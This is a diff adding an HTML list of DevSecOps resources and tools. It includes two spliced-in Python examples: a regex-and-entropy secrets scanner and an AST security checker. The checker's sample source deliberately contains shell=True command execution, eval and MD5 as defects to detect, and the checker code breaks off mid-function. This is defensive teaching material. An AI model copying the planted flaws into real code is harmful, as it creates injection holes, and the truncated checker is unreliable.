update lists
799
html/devsecops.html
Normal file
@@ -0,0 +1,799 @@
<figure>
<img src="media/banner.png" alt="Awesome" />
<figcaption aria-hidden="true">Awesome</figcaption>
</figure>
<p align="center">
<a href="https://awesome.re">
<img alt="Awesome" src="https://awesome.re/badge-flat.svg"> </a>
</p>
<hr/>
<blockquote>
<p>Curating the best DevSecOps resources and tooling.</p>
</blockquote>
<p><a
href="https://www.rapid7.com/fundamentals/devsecops/">DevSecOps</a> is
an extension of the <a
href="https://www.atlassian.com/devops">DevOps</a> movement that aims to
bring security practices into the development lifecycle through
developer-centric security tooling and processes.</p>
<p>Contributions welcome. Add links through pull requests or create an
issue to start a discussion.</p>
<!-- omit in toc -->
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#resources">Resources</a>
<ul>
<li><a href="#articles">Articles</a></li>
<li><a href="#books">Books</a></li>
<li><a href="#communities">Communities</a></li>
<li><a href="#conferences">Conferences</a></li>
<li><a href="#newsletters">Newsletters</a></li>
<li><a href="#podcasts">Podcasts</a></li>
<li><a href="#secure-development-guidelines">Secure Development
Guidelines</a></li>
<li><a href="#secure-development-lifecycle-framework">Secure Development
Lifecycle Framework</a></li>
<li><a href="#toolchains">Toolchains</a></li>
<li><a href="#training">Training</a></li>
<li><a href="#wikis">Wikis</a></li>
</ul></li>
<li><a href="#tools">Tools</a>
<ul>
<li><a href="#dependency-management">Dependency Management</a></li>
<li><a href="#dynamic-analysis">Dynamic Analysis</a></li>
<li><a href="#infrastructure-as-code-analysis">Infrastructure as Code
Analysis</a></li>
<li><a href="#intentionally-vulnerable-applications">Intentionally
Vulnerable Applications</a></li>
<li><a href="#monitoring">Monitoring</a></li>
<li><a href="#secrets-management">Secrets Management</a></li>
<li><a href="#secrets-scanning">Secrets Scanning</a></li>
<li><a href="#static-analysis">Static Analysis</a></li>
<li><a href="#supply-chain-security">Supply Chain Security</a></li>
<li><a href="#threat-modelling">Threat Modelling</a></li>
</ul></li>
<li><a href="#related-lists">Related Lists</a></li>
</ul>
<h2 id="resources">Resources</h2>
<h3 id="articles">Articles</h3>
<ul>
<li><a
href="https://www.pagerduty.com/blog/security-training-at-pagerduty/">Our
Approach to Employee Security Training</a> - <em>Pager Duty</em> -
Guidelines to running security training within an organisation.</li>
<li><a href="https://spacelift.io/blog/what-is-devsecops">DevSecOps:
Making Security Central To Your DevOps Pipeline</a> - <em>Spacelift</em>
- An article explains what DevSecOps aims to achieve, why it’s
advantageous, and how the DevSecOps lifecycle looks.</li>
</ul>
<h3 id="books">Books</h3>
<ul>
<li><a
href="https://www.wiley.com/en-gb/Alice+and+Bob+Learn+Application+Security-p-9781119687405">Alice
and Bob Learn Application Security</a> - <em>Tanya Janca</em> - An
accessible and thorough resource for anyone seeking to incorporate, from
the beginning of the System Development Life Cycle, best security
practices in software development.</li>
</ul>
<h3 id="communities">Communities</h3>
<ul>
<li><a href="https://www.devseccon.com/">DevSecCon</a> - <em>Snyk</em> -
A community that runs conferences, a blog, a podcast and a Discord
dedicated to DevSecOps.</li>
<li><a href="https://tag-security.cncf.io/">TAG Security</a> - <em>Cloud
Native Computing Foundation</em> - TAG Security facilitates
collaboration to discover and produce resources that enable secure
access, policy control, and safety for operators, administrators,
developers, and end-users across the cloud native ecosystem.</li>
</ul>
<h3 id="conferences">Conferences</h3>
<ul>
<li><a href="https://appsecday.io/">AppSec Day</a> - <em>OWASP</em> - An
Australian application security conference run by OWASP.</li>
<li><a href="https://www.devseccon.com/">DevSecCon</a> - <em>Snyk</em> -
A network of DevSecOps conferences run by Snyk.</li>
</ul>
<h3 id="newsletters">Newsletters</h3>
<ul>
<li><a href="https://shift-security-left.curated.co/">Shift Security
Left</a> - <em>Cossack Labs</em> - A free biweekly newsletter for
security-aware developers covering application security, secure
architecture, DevSecOps, cryptography, incidents, etc. that can be
useful for builders and (to a lesser extent) for breakers.</li>
</ul>
<h3 id="podcasts">Podcasts</h3>
<ul>
<li><a href="https://absoluteappsec.com/">Absolute AppSec</a> - <em>Seth
Law & Ken Johnson</em> - Discussions about current events and
specific topics related to application security.</li>
<li><a href="https://podcast.securityjourney.com/">Application Security
Podcast</a> - <em>Security Journey</em> - Interviews with industry
experts about specific application security concepts.</li>
<li><a href="https://blog.aquasec.com/devsecops-podcasts">BeerSecOps</a>
- <em>Aqua Security</em> - Breaking down the silos of Dev, Sec and Ops,
discussing topics that span these subject areas.</li>
<li><a href="https://soundcloud.com/owasp-podcast">DevSecOps Podcast
Series</a> - <em>OWASP</em> - Discussions with thought leaders and
practitioners to integrate security into the development lifecycle.</li>
<li><a
href="https://www.mydevsecops.io/the-secure-developer-podcast">The
Secure Developer</a> - <em>Snyk</em> - Discussion about security tools
and best practices for software developers.</li>
</ul>
<h3 id="secure-development-guidelines">Secure Development
Guidelines</h3>
<ul>
<li><a
href="https://owasp.org/www-project-application-security-verification-standard/">Application
Security Verification Standard</a> - <em>OWASP</em> - A framework of
security requirements and controls to help developers design and develop
secure web applications.</li>
<li><a
href="https://wiki.sei.cmu.edu/confluence/display/seccode/SEI+CERT+Coding+Standards">Coding
Standards</a> - <em>CERT</em> - A collection of secure development
standards for C, C++, Java and Android development.</li>
<li><a
href="https://safecode.org/wp-content/uploads/2018/03/SAFECode_Fundamental_Practices_for_Secure_Software_Development_March_2018.pdf">Fundamental
Practices for Secure Software Development</a> - <em>SAFECode</em> -
Guidelines for implementing key secure development practices throughout
the SDLC.</li>
<li><a
href="https://owasp.org/www-project-proactive-controls/">Proactive
Controls</a> - <em>OWASP</em> - OWASP’s list of top ten controls that
should be implemented in every software development project.</li>
<li><a
href="https://wiki.mozilla.org/WebAppSec/Secure_Coding_Guidelines">Secure
Coding Guidelines</a> - <em>Mozilla</em> - A guideline containing
specific secure development standards for secure web application
development.</li>
<li><a
href="https://owasp.org/www-pdf-archive/OWASP_SCP_Quick_Reference_Guide_v2.pdf">Secure
Coding Practices Quick Reference Guide</a> - <em>OWASP</em> - A
checklist to verify that secure development standards have been
followed.</li>
</ul>
<h3 id="secure-development-lifecycle-framework">Secure Development
Lifecycle Framework</h3>
<ul>
<li><a href="https://www.bsimm.com/framework.html">Building Security In
Maturity Model (BSIMM)</a> - <em>Synopsys</em> - A framework for
software security created by observing and analysing data from leading
software security initiatives.</li>
<li><a
href="https://www.microsoft.com/en-us/securityengineering/sdl/practices">Secure
Development Lifecycle</a> - <em>Microsoft</em> - A collection of tools
and practices that serve as a framework for the secure development
lifecycle.</li>
<li><a
href="https://csrc.nist.gov/CSRC/media/Publications/white-paper/2019/06/07/mitigating-risk-of-software-vulnerabilities-with-ssdf/draft/documents/ssdf-for-mitigating-risk-of-software-vulns-draft.pdf">Secure
Software Development Framework</a> - <em>NIST</em> - A framework
consisting of practices, tasks and implementation examples for a secure
development lifecycle.</li>
<li><a href="https://github.com/OWASP/samm">Software Assurance Maturity
Model</a> - <em>OWASP</em> - A framework to measure and improve the
maturity of the secure development lifecycle.</li>
</ul>
<h3 id="toolchains">Toolchains</h3>
<ul>
<li><a
href="https://www.sans.org/posters/cloud-security-devsecops-best-practices/">Cloud
Security and DevSecOps Best Practices <em>and</em> Securing Web
Application Technologies (SWAT) Checklist</a> - <em>SANS</em> - A poster
containing the Securing Web Application Technologies (SWAT) Checklist,
SANS Cloud Security Curriculum, Cloud Security Top 10, Top 12 Kubernetes
Threats, and Secure DevOps Toolchain.</li>
<li><a
href="https://xebialabs.com/periodic-table-of-devops-tools/">Periodic
Table of DevOps Tools</a> - <em>XebiaLabs</em> - A collection of
DevSecOps tooling categorised by tool functionality.</li>
</ul>
<h3 id="training">Training</h3>
<ul>
<li><a href="https://github.com/duo-labs/appsec-education">Application
Security Education</a> - <em>Duo Security</em> - Training materials
created by the Duo application security team, including introductory and
advanced training presentations and hands-on labs.</li>
<li><a href="https://www.cybrary.it/">Cybrary</a> - <em>Cybrary</em> -
Subscription based online courses with dedicated categories for
cybersecurity and DevSecOps.</li>
<li><a href="https://pentesterlab.com/">PentesterLab</a> -
<em>PentesterLab</em> - Hands on labs to understand and exploit simple
and advanced web vulnerabilities.</li>
<li><a href="https://www.practical-devsecops.com">Practical
DevSecOps</a> - <em>Practical DevSecOps</em> - Learn DevSecOps concepts,
tools, and techniques from industry experts with practical DevSecOps
using state of the art browser-based labs.</li>
<li><a href="https://academy.safestack.io/">SafeStack</a> -
<em>SafeStack</em> - Security training for software development teams,
designed to be accessible to individuals and small teams as well as
larger organisations.</li>
<li><a href="https://www.securecodewarrior.com/">Secure Code Warrior</a>
- <em>Secure Code Warrior</em> - Gamified and hands-on secure
development training with support for courses, assessments and
tournaments.</li>
<li><a href="https://www.secureflag.com/platform.html">SecureFlag</a> -
<em>OWASP</em> - Hands-on secure coding training for Developers and
Build/Release Engineers.</li>
<li><a href="https://sudo.pagerduty.com/for_engineers/">Security
Training for Engineers</a> - <em>Pager Duty</em> - A presentation
created and open-sourced by PagerDuty to provide security training to
software engineers.</li>
<li><a href="https://sudo.pagerduty.com/for_everyone/">Security Training
for Everyone</a> - <em>Pager Duty</em> - A presentation created and
open-sourced by PagerDuty to provide security training employees.</li>
<li><a href="https://academy.semgrep.dev/">Semgrep Academy</a> -
<em>Semgrep</em> - Free, on-demand courses covering topics including API
security, secure coding and application security.<br />
</li>
<li><a href="https://portswigger.net/web-security">Web Security
Academy</a> - <em>PortSwigger</em> - A set of materials and labs to
learn and exploit common web vulnerabilities.</li>
<li><a href="https://wehackpurple.com/">WeHackPuple</a> -
<em>WeHackPurple</em> - Online courses that teach application security
theory and hands-on technical lessons.</li>
</ul>
<h3 id="wikis">Wikis</h3>
<ul>
<li><a href="https://snyk.io/devsecops/">DevSecOps Hub</a> -
<em>Snyk</em> - Introduction to key DevSecOps concepts, processes and
technologies.</li>
<li><a href="https://knowledge-base.secureflag.com/">SecureFlag
Knowledge Base</a> - <em>OWASP</em> - A repository of information about
software vulnerabilities and how to prevent them.</li>
</ul>
<h2 id="tools">Tools</h2>
<h3 id="dependency-management">Dependency Management</h3>
<p>Open source software packages can speed up the development process by
allowing developers to implement functionality without having to write
all of the code. However, with the open source code comes open source
vulnerabilities. Dependency management tools help manage vulnerabilities
in open source packages by identifying and updating packages with known
vulnerabilities.</p>
<ul>
<li><a href="https://github.com/deepfence/ThreatMapper">Deepfence
ThreatMapper</a> - Apache v2, powerful runtime vulnerability scanner for
kubernetes, virtual machines and serverless.</li>
<li><a href="https://dependabot.com/">Dependabot</a> - <em>GitHub</em> -
Automatically scan GitHub repositories for vulnerabilities and create
pull requests to merge in patched dependencies.</li>
<li><a
href="https://owasp.org/www-project-dependency-check/">Dependency-Check</a>
- <em>OWASP</em> - Scans dependencies for publicly disclosed
vulnerabilities using CLI or build server plugins.</li>
<li><a href="https://dependencytrack.org/">Dependency-Track</a> -
<em>OWASP</em> - Monitor the volume and severity of vulnerable
dependencies across multiple projects over time.</li>
<li><a href="https://jfrog.com/xray/">JFrog XRay</a> - <em>JFrog</em> -
Security and compliance analysis for artifacts stored in JFrog
Artifactory.</li>
<li><a href="https://docs.npmjs.com/cli/audit">NPM Audit</a> -
<em>NPM</em> - Vulnerable package auditing for node packages built into
the npm CLI.</li>
<li><a href="https://renovate.whitesourcesoftware.com/">Renovate</a> -
<em>WhiteSource</em> - Automatically monitor and update software
dependencies for multiple frameworks and languages using a CLI or git
repository apps.</li>
<li><a href="https://requires.io/">Requires.io</a> - <em>Olivier Mansion
& Alexis Tabary</em> - Automated vulnerable dependency monitoring
and upgrades for Python projects.</li>
<li><a
href="https://snyk.io/product/open-source-security-management/">Snyk
Open Source</a> - <em>Snyk</em> - Automated vulnerable dependency
monitoring and upgrades using Snyk’s dedicated vulnerability
database.</li>
</ul>
<h3 id="dynamic-analysis">Dynamic Analysis</h3>
<p>Dynamic Analysis Security Testing (DAST) is a form of black-box
security testing where a security scanner interacts with a running
instance of an application, emulating malicious activity to find common
vulnerabilities. DAST tools are commonly used in the initial phases of a
penetration test, and can find vulnerabilities such as cross-site
scripting, SQL injection, cross-site request forgery and information
disclosure.</p>
<ul>
<li><a
href="https://github.com/imperva/automatic-api-attack-tool">Automatic
API Attack Tool</a> - <em>Imperva</em> - Perform automated security
scanning against an API based on an API specification.</li>
<li><a href="https://portswigger.net/burp/enterprise">BurpSuite
Enterprise Edition</a> - <em>PortSwigger</em> - BurpSuite’s web
application vulnerability scanner used widely by penetration testers,
modified with CI/CD integration and continuous monitoring over multiple
web applications.</li>
<li><a href="https://github.com/gauntlt/gauntlt">Gauntlt</a> -
<em>Gauntlt</em> - A Behaviour Driven Development framework to run
security scans using common security tools and test output, defined
using Gherkin syntax.</li>
<li><a href="https://github.com/spectralops/netz">Netz</a> -
<em>Spectral</em> - Discover internet-wide misconfigurations, using
zgrab2 and others.</li>
<li><a href="https://github.com/microsoft/restler-fuzzer">RESTler</a> -
<em>Microsoft</em> - A stateful RESTful API scanner based on
peer-reviewed research papers.</li>
<li><a href="https://github.com/ssllabs/ssllabs-scan">SSL Labs Scan</a>
- <em>SSL Labs</em> - Automated scanning for SSL / TLS configuration
issues.</li>
<li><a href="https://github.com/zaproxy/zaproxy">Zed Attack Proxy
(ZAP)</a> - <em>OWASP</em> - An open-source web application
vulnerability scanner, including an API for CI/CD integration.</li>
</ul>
<h3 id="infrastructure-as-code-analysis">Infrastructure as Code
Analysis</h3>
<p>Infrastructure as Code allows applications to be deployed reliably to
a consistent environment. This not only ensures that infrastructure is
consistently hardened, but also provides an opportunity to statically
and dynamically analyse infrastructure definitions for vulnerable
dependencies, hard-coded secrets, insecure configuration and
unintentional changes in security configuration. The following tools
facilitate this analysis.</p>
<h4 id="multi-platform">Multi-Platform</h4>
<ul>
<li><a href="https://github.com/bridgecrewio/checkov">Checkov</a> -
<em>Bridgecrew</em> - Scan Terraform, AWS CloudFormation and Kubernetes
templates for insecure configuration.</li>
<li><a href="https://github.com/Checkmarx/kics">KICS</a> -
<em>Checkmarx</em> - Find security vulnerabilities, compliance issues,
and infrastructure misconfigurations early in the development
cycle.</li>
<li><a
href="https://spectralops.io/blog/spectral-launches-deepconfig-to-ensure-no-misconfiguration-at-all-layers-of-software/">Spectral
DeepConfig</a> - <em>Spectral</em> - Find misconfiguration both in
infrastructure as well as apps as early as commit time.</li>
<li><a href="https://github.com/accurics/terrascan">Terrascan</a> -
<em>Accurics</em> - Detect compliance and security violations across
Infrastructure as Code to mitigate risk before provisioning cloud native
infrastructure.</li>
</ul>
<!-- omit in toc -->
<h4 id="cloud-formation">Cloud Formation</h4>
<ul>
<li><a href="https://github.com/stelligent/cfn_nag">Cfn Nag</a> -
<em>Stelligent</em> - Scan AWS CloudFormation templates for insecure
configuration.</li>
</ul>
<!-- omit in toc -->
<h4 id="containers">Containers</h4>
<ul>
<li><a href="https://github.com/quay/clair">Clair</a> - <em>Red Hat</em>
- Scan App Container and Docker containers for publicly disclosed
vulnerabilities.</li>
<li><a href="https://github.com/eliasgranderubio/dagda/">Dagda</a> -
<em>Elías Grande</em> - Compares OS and software dependency versions
installed in Docker containers with public vulnerability databases, and
also performs virus scanning.</li>
<li><a
href="https://github.com/docker/docker-bench-security">Docker-Bench-Security</a>
- <em>Docker</em> - The Docker Bench for Security is a script that
checks for dozens of common best-practices around deploying Docker
containers in production.</li>
<li><a href="https://github.com/anchore/grype/">Grype</a> -
<em>Anchore</em> - An easy-to-integrate open source vulnerability
scanning tool for container images and filesystems.</li>
<li><a href="https://github.com/hadolint/hadolint">Hadolint</a> -
<em>Hadolint</em> - Checks a Dockerfile against known rules and
validates inline bash code in RUN statements.</li>
<li><a
href="https://snyk.io/product/container-vulnerability-management/">Snyk
Container</a> - <em>Snyk</em> - Scan Docker and Kubernetes applications
for security vulnerabilities during CI/CD or via continuous
monitoring.</li>
<li><a href="https://github.com/aquasecurity/trivy">Trivy</a> - <em>Aqua
Security</em> - Simple and comprehensive vulnerability scanner for
containers.</li>
</ul>
<!-- omit in toc -->
<h4 id="terraform">Terraform</h4>
<ul>
<li><a href="https://github.com/fugue/regula">Regula</a> -
<em>Fugue</em> - Evaluate Terraform infrastructure-as-code for potential
security misconfigurations and compliance violations prior to
deployment.</li>
<li><a href="https://terraform-compliance.com/">Terraform Compliance</a>
- <em>terraform-compliance</em> - A lightweight, security and compliance
focused test framework against terraform to enable negative testing
capability for your infrastructure-as-code.</li>
<li><a href="https://github.com/liamg/tfsec">Tfsec</a> - <em>Liam
Galvin</em> - Scan Terraform templates for security misconfiguration and
noncompliance with AWS, Azure and GCP security best practice.</li>
</ul>
<!-- omit in toc -->
<h4 id="kubernetes">Kubernetes</h4>
<ul>
<li><a href="https://kubescape.io/">Kubescape</a> - <em>Cloud Native
Computing Foundation</em> - An open-source Kubernetes security platform
for your IDE, CI/CD pipelines, and clusters.</li>
<li><a href="https://github.com/zegl/kube-score">Kube-Score</a> -
<em>Gustav Westling</em> - Scan Kubernetes object definitions for
security and performance misconfiguration.</li>
<li><a href="https://github.com/controlplaneio/kubectl-kubesec">Kubectrl
Kubesec</a> - <em>ControlPlane</em> - Plugin for kubesec.io to perform
security risk analysis for Kubernetes resources.</li>
</ul>
<h4 id="ansible">Ansible</h4>
<ul>
<li><a
href="https://github.com/ansible-community/ansible-lint">Ansible-Lint</a>
- <em>Ansible Community</em> - Checks playbooks for practices and
behaviour that could potentially be improved. As a community backed
project ansible-lint supports only the last two major versions of
Ansible.</li>
</ul>
<h3 id="intentionally-vulnerable-applications">Intentionally Vulnerable
Applications</h3>
<p>Intentionally vulnerable applications are often useful when
developing security tests and tooling to provide a place you can run
tests and make sure they fail correctly. These applications can also be
useful for understanding how common vulnerabilities are introduced into
applications and let you practice your skills at exploiting them.</p>
<ul>
<li><a href="https://github.com/chromium/badssl.com">Bad SSL</a> -
<em>The Chromium Project</em> - A container running a number of
webservers with poor SSL / TLS configuration. Useful for testing
tooling.</li>
<li><a href="https://github.com/bridgecrewio/cfngoat">Cfngoat</a> -
<em>Bridgecrew</em> - Cloud Formation templates for creating stacks of
intentionally insecure services in AWS. Ideal for testing the Cloud
Formation Infrastructure as Code Analysis tools above.</li>
<li><a href="https://github.com/cider-security-research/cicd-goat">CI/CD
Goat</a> - <em>Cider Security</em> - A deliberately vulnerable CI/CD
environment. Learn CI/CD security through multiple challenges.</li>
<li><a href="http://www.dvwa.co.uk/">Damn Vulnerable Web App</a> -
<em>Ryan Dewhurst</em> - A web application that provides a safe
environment to understand and exploit common web vulnerabilities.</li>
<li><a href="https://github.com/bkimminich/juice-shop">Juice Shop</a> -
<em>OWASP</em> - A web application containing the OWASP Top 10 security
vulnerabilities and more.</li>
<li><a href="https://github.com/madhuakula/kubernetes-goat">Kubernetes
Goat</a> - <em>Madhu Akula</em> - Intentionally vulnerable cluster
environment to learn and practice Kubernetes security.</li>
<li><a href="https://github.com/OWASP/NodeGoat">NodeGoat</a> -
<em>OWASP</em> - A Node.js web application that demonstrates and
provides ways to address common security vulnerabilities.</li>
<li><a href="https://pentest-ground.com/">Pentest-Ground</a> -
<em>Pentest-Tools.com</em> - Pentest-Ground is a free playground with
deliberately vulnerable web applications and network services.</li>
<li><a href="https://github.com/bridgecrewio/terragoat">Terragoat</a> -
<em>Bridgecrew</em> - Terraform templates for creating stacks of
intentionally insecure services in AWS, Azure and GCP. Ideal for testing
the Terraform Infrastructure as Code Analysis tools above.</li>
<li><a
href="https://owasp.org/www-project-vulnerable-web-applications-directory">Vulnerable
Web Apps Directory</a> - <em>OWASP</em> - A collection of vulnerable web
applications for learning purposes.</li>
<li><a href="https://github.com/OWASP/wrongsecrets">WrongSecrets</a> -
<em>OWASP</em> - Vulnerable app with examples showing how to not use
secrets</li>
</ul>
<h3 id="monitoring">Monitoring</h3>
<p>It’s not enough to test and harden our software in the lead up to a
release. We must also monitor our production software for usage,
performance and errors to capture malicious behavior and potential
security flaws that we may need to respond to or address. A wide variety
of tools are available to monitor different aspects of production
software and infrastructure.</p>
<ul>
<li><a href="https://csper.io/report-uri">Csper</a> - <em>Csper</em> - A
set of Content Security Policy tools that can test policies, monitor CSP
reports and provide metrics and alerts.</li>
<li><a href="https://streamdal.com">Streamdal</a> - <em>Streamdal</em> -
Embed privacy controls in your application code to detect and monitor
PII as it enters and leaves your systems, preventing it from reaching
unintended databases, data streams, or pipelines.</li>
</ul>
<h3 id="secrets-management">Secrets Management</h3>
<p>The software we write needs to use secrets (passwords, API keys,
certificates, database connection strings) to access resources, yet we
cannot store secrets within the codebase as this leaves them vulnerable
to compromise. Secret management tools provide a means to securely
store, access and manage secrets.</p>
<ul>
<li><a
href="https://docs.ansible.com/ansible/latest/user_guide/vault.html">Ansible
Vault</a> - <em>Ansible</em> - Securely store secrets within Ansible
pipelines.</li>
<li><a href="https://aws.amazon.com/kms/">AWS Key Management Service
(KMS)</a> - <em>Amazon AWS</em> - Create and manage cryptographic keys
in AWS.</li>
<li><a href="https://aws.amazon.com/secrets-manager/">AWS Secrets
Manager</a> - <em>Amazon AWS</em> - Securely store retrievable
application secrets in AWS.</li>
<li><a
href="https://azure.microsoft.com/en-au/services/key-vault/">Azure Key
Vault</a> - <em>Microsoft Azure</em> - Securely store secrets within
Azure.</li>
<li><a href="https://github.com/StackExchange/blackbox">BlackBox</a> -
<em>StackExchange</em> - Encrypt credentials within your code
repository.</li>
<li><a href="https://github.com/chef/chef-vault">Chef Vault</a> -
<em>Chef</em> - Securely store secrets within Chef.</li>
<li><a href="https://github.com/fugue/credstash">CredStash</a> -
<em>Fugue</em> - Securely store secrets within AWS using KMS and
DynamoDB.</li>
<li><a
href="https://www.cyberark.com/products/privileged-account-security-solution/application-access-manager/">CyberArk
Application Access Manager</a> - <em>CyberArk</em> - Secrets management
for applications including secret rotation and auditing.</li>
<li><a href="https://docs.docker.com/engine/swarm/secrets/">Docker
Secrets</a> - <em>Docker</em> - Store and manage access to secrets
within a Docker swarm.</li>
<li><a href="https://github.com/awslabs/git-secrets">Git Secrets</a> -
<em>Amazon AWS</em> - Scan git repositories for secrets committed within
code or commit messages.</li>
<li><a href="https://github.com/gopasspw/gopass">Gopass</a> -
<em>Gopass</em> - Password manager for teams relying on Git and gpg.
Manages secrets in encrypted files and repositories.</li>
<li><a href="https://cloud.google.com/kms">Google Cloud Key Management
Service (KMS)</a> - <em>Google Cloud Platform</em> - Securely store
secrets within GCP.</li>
<li><a href="https://www.vaultproject.io/">HashiCorp Vault</a> -
<em>HashiCorp</em> - Securely store secrets via UI, CLI or HTTP
API.</li>
<li><a href="https://github.com/SpectralOps/keyscope">Keyscope</a> -
<em>Spectral</em> - Keyscope is an open source key and secret workflow
tool (validation, invalidation, etc.) built in Rust.</li>
<li><a href="https://github.com/pinterest/knox">Pinterest Knox</a> -
<em>Pinterest</em> - Securely store, rotate and audit secrets.</li>
<li><a href="https://github.com/mozilla/sops">Secrets Operations
(SOPS)</a> - <em>Mozilla</em> - Encrypt keys stored within YAML, JSON,
ENV, INI and BINARY files.</li>
<li><a href="https://github.com/spectralops/teller">Teller</a> -
<em>Spectral</em> - A secrets management tool for developers - never
leave your command line for secrets.</li>
</ul>
<h3 id="secrets-scanning">Secrets Scanning</h3>
<p>Source control is not a secure place to store secrets such as
credentials, API keys or tokens, even if the repo is private. Secrets
scanning tools can scan and monitor git repositories and pull-requests
for secrets, and can be used to prevent secrets from being committed, or
to find and remove secrets that have already been committed to source
control.</p>
<ul>
<li><a
href="https://secdevtools.azurewebsites.net/helpcredscan.html">CredScan</a>
- <em>Microsoft</em> - A credential scanning tool that can be run as a
task in Azure DevOps pipelines.</li>
|
||||
<li><a href="https://github.com/Yelp/detect-secrets">Detect Secrets</a>
|
||||
- <em>Yelp</em> - An aptly named module for (surprise, surprise)
|
||||
detecting secrets within a code base.</li>
|
||||
<li><a href="https://www.gitguardian.com/">GitGuardian</a> -
|
||||
<em>GitGuardian</em> - A web-based solution that scans and monitors
|
||||
public and private git repositories for secrets.</li>
|
||||
<li><a href="https://github.com/zricethezav/gitleaks">Gitleaks</a> -
|
||||
<em>Zachary Rice</em> - Gitleaks is a SAST tool for detecting hardcoded
|
||||
secrets like passwords, api keys, and tokens in git repositories.</li>
|
||||
<li><a href="https://github.com/awslabs/git-secrets">git-secrets</a> -
|
||||
<em>AWS Labs</em> - Scans commits, commit messages and merges for
|
||||
secrets. Native support for AWS secret patterns, but can be configured
|
||||
to support other patterns.</li>
|
||||
<li><a
|
||||
href="https://nightfall.ai/solutions/product/github">Nightfall</a> -
|
||||
<em>Nightfall</em> - A web-based platform that monitors for sensitive
|
||||
data disclosure across several SDLC tools, including GitHub
|
||||
repositories.</li>
|
||||
<li><a
|
||||
href="https://github.com/auth0/repo-supervisor">Repo-supervisor</a> -
|
||||
<em>Auth0</em> - Secrets scanning tool that can run as a CLI, as a
|
||||
Docker container or in AWS Lambda.</li>
|
||||
<li><a href="https://spectralops.io">SpectralOps</a> - <em>Spectral</em>
|
||||
- Automated code security, secrets, tokens and sensitive data
|
||||
scanning.</li>
|
||||
<li><a
|
||||
href="https://github.com/trufflesecurity/truffleHog">truffleHog</a> -
|
||||
<em>Truffle Security</em> - Searches through git repositories for
|
||||
secrets, digging deep into commit history and branches.</li>
|
||||
</ul>
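<p>As an added example (not code from this page or from any of the scanners listed above), the following Python script shows the two detection strategies these tools combine: fixed signatures for well-known key formats, and Shannon entropy for opaque strings that no signature knows about. It scans only the added lines of a unified diff, which is exactly what a pre-commit hook sees. The patterns, the entropy threshold of 4.0 bits per character and the sample diff are constructed for the example; the AKIAIOSFODNN7EXAMPLE value is the placeholder access key ID from AWS documentation, not a live credential.</p>

```python
import math
import re
from collections import Counter

# Signature rules of the kind git-secrets and gitleaks ship with. The AWS
# access key ID shape (AKIA plus 16 upper-case alphanumerics) is public;
# the other two patterns are simplified examples for this script.
PATTERNS = {
    "aws-access-key-id": re.compile(r"\b(AKIA[0-9A-Z]{16})\b"),
    "private-key-block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "generic-assignment": re.compile(
        r"(?i)\b(?:password|passwd|secret|api[_-]?key|token)\b\s*[:=]\s*['\"]([^'\"]{8,})['\"]"
    ),
}

# Entropy rule, the approach truffleHog and detect-secrets use for secrets
# no signature knows about. Threshold and minimum length are assumptions
# chosen for this example; real tools tune them and ship allow-lists.
ENTROPY_THRESHOLD = 4.0
CANDIDATE = re.compile(r"[A-Za-z0-9+/=_\-]{20,}")


def shannon_entropy(s):
    """Bits of entropy per character of s."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def scan_line(line):
    """Return (rule, matched_text) pairs for one line of source."""
    findings = [(name, m.group(0)) for name, pat in PATTERNS.items() for m in pat.finditer(line)]
    for m in CANDIDATE.finditer(line):
        if shannon_entropy(m.group(0)) >= ENTROPY_THRESHOLD:
            findings.append(("high-entropy", m.group(0)))
    return findings


def scan_diff(diff_text):
    """Scan only the added lines of a unified diff, as a pre-commit hook
    would, and return (diff_line_number, rule, matched_text) triples."""
    results = []
    for lineno, raw in enumerate(diff_text.splitlines(), 1):
        if raw.startswith("+++") or not raw.startswith("+"):
            continue  # file header, context line or removed line
        for rule, value in scan_line(raw[1:]):
            results.append((lineno, rule, value))
    return results


# Constructed diff for the example. The access key ID is the placeholder
# value from AWS documentation, not a real credential.
SAMPLE_DIFF = """\
--- a/settings.py
+++ b/settings.py
@@ -1,3 +1,5 @@
 import os
-password = os.environ["DB_PASSWORD"]
+password = "correct-horse-battery"
+aws_access_key_id = AKIAIOSFODNN7EXAMPLE
+SIGNING_KEY = "aB3dE5fG7hJ9kL1mN2pQ4rS6tU8vW0xY"
 print("configured")
"""

if __name__ == "__main__":
    for lineno, rule, value in scan_diff(SAMPLE_DIFF):
        print(f"diff line {lineno}: {rule}: {value}")
```

<p>Wired into a pre-commit hook this would be fed the output of <code>git diff --cached</code> and exit non-zero on any finding; the same function run over <code>git log -p</code> output covers history. Expect false positives from the entropy rule on hashes and base64 blobs, which is why the real tools ship allow-lists and baseline files.</p>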
<h3 id="static-analysis">Static Analysis</h3>
<p>Static Application Security Testing (SAST) tools scan software for
vulnerabilities without executing the target software. Typically, static
analysis will scan the source code for security flaws such as the use of
unsafe functions, hard-coded secrets and configuration issues. SAST
tools often come in the form of IDE plugins and CLIs that can be
integrated into CI/CD pipelines.</p>
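<p>An added example, not code from this page or from Bandit or any other tool below: a small AST-based checker in Python showing why SAST tools parse code rather than grep it. A grep for <code>md5</code> also hits comments and strings; walking the syntax tree lets a rule ask about the resolved callee name and the actual keyword arguments, so <code>subprocess.call(cmd, shell=True)</code> is flagged while the same call without <code>shell=True</code> is not. The rule set, the rule identifiers and the sample source are constructed for the example.</p>

```python
import ast

# Constructed sample, not taken from any real project: three flaws a SAST
# tool is expected to catch and one safe call that must not be flagged.
SAMPLE_SOURCE = '''
import subprocess
import hashlib

DB_PASSWORD = "s3cret-password-value"

def run(cmd):
    subprocess.call(cmd, shell=True)

def digest(data):
    return hashlib.md5(data).hexdigest()

def parse(expr):
    return eval(expr)

def safe(data):
    return hashlib.sha256(data).hexdigest()
'''

SECRET_WORDS = ("password", "secret", "token")
WEAK_HASHES = ("hashlib.md5", "hashlib.sha1")
SHELL_RUNNERS = ("subprocess.call", "subprocess.run", "subprocess.Popen", "subprocess.check_output")


def dotted_name(node):
    """'hashlib.md5' for a Name/Attribute chain, None for anything else
    (for instance a method called on the result of another call)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


class SecurityVisitor(ast.NodeVisitor):
    def __init__(self):
        self.findings = []  # (lineno, rule_id, message); rule ids are made up for this example

    def visit_Assign(self, node):
        # A string literal assigned to a secret-looking name.
        value = node.value
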